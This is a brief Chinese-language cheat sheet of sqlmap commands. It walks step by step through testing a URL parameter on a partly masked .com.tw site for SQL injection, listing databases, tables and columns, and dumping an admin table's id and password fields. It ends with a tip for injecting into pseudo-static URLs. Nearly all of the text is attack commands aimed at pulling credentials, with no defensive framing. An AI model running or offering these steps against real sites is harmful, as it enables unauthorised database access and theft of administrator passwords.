SQLMAP 实用技巧

基础版：

1. 检查注入点

   
   

   sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

2. 列数据库信息

   
   

   sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

3. 指定库名列出所有表

   
   

   sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

4. 指定库名表名列出所有字段

   
   

   sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

5. 指定库名表名字段dump出指定字段

   
   

   sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

SQLMAP伪静态注入：

注入页面：http://www.xxx.org/news/class/?103.htm

命令：python sqlmap.py -u “http://www.xxx.org/news/class/?103*.html”